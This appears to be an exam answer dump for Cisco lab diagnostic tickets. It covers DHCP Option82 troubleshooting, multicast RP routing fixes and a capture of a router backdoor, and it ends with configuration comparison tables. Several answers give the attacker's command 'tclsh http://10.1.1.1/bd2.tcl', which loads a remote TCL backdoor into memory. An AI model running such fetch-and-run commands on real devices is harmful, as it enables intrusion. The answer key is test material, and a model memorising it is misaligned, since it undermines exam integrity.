active: #227
//RA: FE80::666
What is the issue?
R2 has no route to RP
What will you ask your engineer?
Why is 10.4.1.0/24 not in R2's RIB?
How to deal with the current issue temporarily?
R2(config)#ip route 10.4.1.1 255.255.255.255 10.0.0.17
//note: 10.0.0.17 is the address of R4, if you find next-hop is wrong, you can choose
R3(config)#ip mroute 10.4.1.1 255.255.255.255 10.0.0.17
How to differentiate the H3 DIAG and H3+ DIAG

If you can find the command line "configure CE2 with highest HSRPv6 priority", it is H2 DIAG
If you cannot find the command line "configure CE2 with highest HSRPv6 priority", it is H2+ DIAG

If you find R3 show ip pim rp is 0.0.0.0, it is H2 DIAG
If you find R2 show ip pim rp is 0.0.0.0, it is H2+ DIAG
Tickets H3 Diag
DIAGs come as a set. They don't come with mixed questionnaires.

Ticket 1

Question 1 Which material is most helpful?
Device: SW1 ; Command: show ip dhcp relay information trusted-resource
Question 2 Which packets can help you find the cause?
Seq: 113, the packet is a DHCP discovery, source IP address is 0.0.0.0
Question 3 Where to capture packets on the topology?
between SW1-SW3

Ticket 2

Attacker is 10.1.1.2, Server is 10.1.1.1


Question 1 What does the capture effectively show? Select all that apply (9, choose 4)
TCP connection from the router to 10.1.1.2
TCP connection from a remote host to router's IP address 10.1.1.1 on port 1337
Download of a TCL script in memory via HTTP
Installment of a ransomware via a backdoor

other options (not to be selected)!!!

TCP connection from the router to 10.1.1.1
TCP connection from a remote host to router's IP address 10.1.1.2 on port 1337
Download of a TCL script in memory via HTTPS
Installment of a backdoor via ransomware
TCP connection from 10.1.1.1 to the router via VTY

Question 2 Which command if issued from the Hacker end can bring down the
complete system?
power off
Question 3 Which command is the attacker using?
tclsh http://10.1.1.1/bd2.tcl
other options (not to be selected)!!!
http://10.1.1.1/bd2.tcl
copy http://10.1.1.1/bd2.tcl
H3+ Diag

Problem: Server1 - cannot get an IP Address

traffic_capture_DHCP_SNOOP_0001.pcapng

Option82 is EMPTY (from the Capture)

Which material is most helpful?


Command: show ip dhcp relay information trusted-resource

Which packets can help you find the cause?


Seq: 114, the packet is about DHCP discovery, source IP address is 0.0.0.0
Where to capture packets on the topology?

between SW1-SW3

traffic_capture_TCL_SCRIPTING_0001.pcapng

Attacker is 10.1.1.2, Server is 10.1.1.1


What does the capture effectively show? Select all that apply (8, choose 4)
TCP connection from the router to 10.1.1.2
TCP connection from a remote host to router's IP address 10.1.1.1 on
port 1337
Download of a TCL script in memory via HTTP
Installment of a ransomware via a backdoor

other options (not to be selected)!!!


TCP connection from the router to 10.1.1.1
TCP connection from a remote host to router's IP address 10.1.1.2 on
port 1337
Download of a TCL script in memory via HTTPS
Installment of a backdoor via ransomware

Which command if issued from the Hacker end can bring down the
complete system?
power off
Which command is the attacker using?
tclsh http://10.1.1.1/bd2.tcl
other options (not to be selected)!!!
http://10.1.1.1/bd2.tcl
copy http://10.1.1.1/bd2.tcl
H3++ Diag

Open the capture in Wireshark

Then filter with 'bootp'
Select the first "DHCP Discover" packet
Choose the Option82 inside it

What is the problem that you can get from the packet?
Its source IP Address is 0.0.0.0

Which packets can help you find the cause?


Seq: 114, the packet is about DHCP discovery, source IP address is 0.0.0.0
Where to capture packets on the topology?

between SW1-SW3

http.request.method==GET
tcp.stream eq 0-4
png tcp.port==3001

Attacker is 10.1.1.2, Server is 10.1.1.1


What does the capture effectively show? Select all that apply (8, choose 4)
TCP SESSION from 10.1.1.1 to the router via VTY
TCP connection from a remote host to router's IP address
10.1.1.1 on port 1337
Download of a TCL script in memory via HTTP
Installment of a ransomware via a backdoor

other options (not to be selected)!!!


TCP connection from the router to 10.1.1.1
TCP connection from a remote host to router's IP address
10.1.1.2 on port 1337
Download of a TCL script in memory via HTTPS
Installment of a backdoor via ransomware

Which command if issued from the Hacker end can bring down
the complete system?
power off
Which command is the attacker using?
tclsh http://10.1.1.1/bd2.tcl
other options (not to be selected)!!!
http://10.1.1.1/bd2.tcl
copy http://10.1.1.1/bd2.tcl
H3+++ Diag

Option82 - Packet with Value (example only, not in the Capture)

Which material is most helpful?


Device: SW1; Command: show ip dhcp relay information trusted-resource
Which packets can help you find the cause?
Seq: 113, the packet is about DHCP discovery, source IP address is 0.0.0.0
Where to capture packets on the topology?

between SW1-SW3

Attacker is 10.1.1.1, Server is 10.1.1.2


What does the capture effectively show? Select all that apply (9, choose 4)
TCP connection from the router to 10.1.1.1
TCP connection from a remote host to router's IP address 10.1.1.2 on port
1337
Download of a TCL script in memory via HTTP
Installment of a ransomware via a backdoor

other options (not to be selected)!!!


TCP connection from 10.1.1.1 to the router via VTY
TCP connection from a remote host to router's IP address 10.1.1.1 on port
1337
Download of a TCL script in memory via HTTPS
Installment of a backdoor via ransomware
TCP connection from the router to 10.1.1.2

Which command if issued from the Hacker end can bring down the
complete system?
power off
Which command is the attacker using?
tclsh http://10.1.1.2/bd2.tcl
How to differentiate the H3 DIAG and H3+ DIAG

If you are asked to choose the device and command line, it is H3 DIAG

If you are asked to choose the command line, it is H3+ DIAG. You can check the seq
<< this could be 133

If Question 1 has 9 options, it is H3 DIAG

If Question 1 has 8 options, it is H3+, H++ DIAG
Section | Section Description | H1 CONF | H1+ CONF
1.1 | VTP | SW1/SW2 - VTP server/client; SW3/SW4 - VTP Transparent | SW1/SW2 - VTP Transparent; SW3/SW4 - VTP Server Client
1.2 | L2 Ports | the same, except for VLAN database | the same, except for VLAN database
1.3 | STP | Rapid-PVST | MST
1.4 | WAN Switching | same | same
2.1 | OSPF in AS12345 | same | same, except for R1 max-metric router-lsa
2.2 | EIGRP in 34567 | same | same
2.3 | EIGRP in 45678 | R15/R16/R17 are Named, SW5/SW6 are classic | R15/R16/R17/SW5/SW6 are all Named, with hmac authentication
2.4 | EIGRP in 45678 (remote) | same | same
2.5 | BGP in AS12345 | same (peer-group is iBGP) | same (peer-group is iBGP)
2.6 | BGP in 34567 | same | same
2.7 | BGP in 45678/65222 | AS 20003, use BGP Backdoor | VRF LOCALSP for AS 20003
2.8 | Routing Policies | same, permit 123.0.0.0/8 le 32 | same, permit 123.0.0.0/8 le 32
2.9 | IPv6 OSPF | ipv6 router ospf 1 | router ospfv3 1
2.10 | BGP for IPv6 | minor change due to sec 2.9 | minor change due to sec 2.9
2.11 | L3 Multicast | same | same
3.1 | MPLS VPN Part1 | same | same
3.2 | MPLS VPN Part2 | same | same
3.3 | DMVPN | non-VRF aware | VRF aware
3.4 | DMVPN Encryption | pre-shared | keying pre-share, for VRF
4.1 | Device Security | same - banner | same - banner
4.2 | Network Security | port-security sticky, violation shut | port-security sticky
5.1 | System Management | ssh, ip domain name cisco.com | ssh, ip domain name acme.org
5.2 | Network Services | NAT, same | NAT, same
5.3 | Network Optimization | top talkers | shell processing full
5.4 | Network Services | NTPv4, no auth | NTPv4, with Authentication
Section Section Description
1.1 DC Access port
1.2 Jameson's DC trunk ports
1.3 Jameson's DC link bundling
1.4 Jameson's DC Branch Offices
2.1 Jameson's IGP Part1
2.2 Jameson's IGP Part2
2.3 Jacob's IGP
2.4 Jameson's Pre-merge
2.5 Jacob's pre-merge
2.6 Merge Phase 1 - BGP
2.7 Merge Phase 2 - IGP
2.8 Merge Phase 2 - Routing Policies
2.9 IPv6 Routing Part1
2.10 IPv6 Routing Part2
2.11 Multicasting in Jamesons
3.1 Jameson's Branch Offices
3.2 Jameson's Pre-merge VPN
3.3 Merge Phase 2 - VPN
3.4 Inter-VPN Routing
4.1 Device Security
4.2 Network Security
5.1 Centralized DHCP
5.2 Internet Gateway
5.3 First Hop redundancy
5.4 Tracking and Reachability
H2 CONF H2+ CONF
SW3 - VTP server SW3/SW4/SW5/SW6 - VTP Transparent
SW4/SW5/SW6 - VTP client
snmp-traps

Rapid-PVST MST
LACP PAGP
PPP PPP within VRF
OSPF with LSA2 OSPF without LSA2 in DC, the same to the rest
OSPF P2M, stub OSPF in VRF
Named EIGRP with, Tagging Named EIGRP with RIB Scale metric
R15/R16 - AS65005 deny normal redistribution.
default-info originate Default info facing the PE
match internal/ext 2
OSPF, redist bgp metric-ty 1

same (peer-group is iBGP) same (peer-group is iBGP)
